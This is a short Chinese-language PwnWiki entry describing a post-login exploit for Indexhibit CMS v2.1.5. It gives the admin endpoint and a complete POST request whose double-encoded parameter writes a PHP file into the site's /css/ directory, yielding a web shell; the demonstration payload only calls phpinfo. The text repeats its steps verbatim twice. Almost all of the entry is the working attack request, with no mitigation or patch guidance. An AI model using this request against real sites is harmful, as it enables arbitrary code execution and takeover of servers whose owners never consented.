Indexhibit cms v2.1.5 編輯php文件getshell漏洞
From PwnWiki
漏洞利用
當我們登錄進後台後,向/ndxzstudio/?a=system post數據:
upd_jxcode=true&v=%253C%253Fphp%2520phpinfo()%253B%253F%253E&id=%2Fcss%2Faudio.php
即可在/css/目錄寫入一個php文件audio.php。
成功getshell
當我們登錄進後台後,向/ndxzstudio/?a=system post數據:
upd_jxcode=true&v=%253C%253Fphp%2520phpinfo()%253B%253F%253E&id=%2Fcss%2Faudio.php
即可在/css/目錄寫入一個php文件audio.php。
成功getshell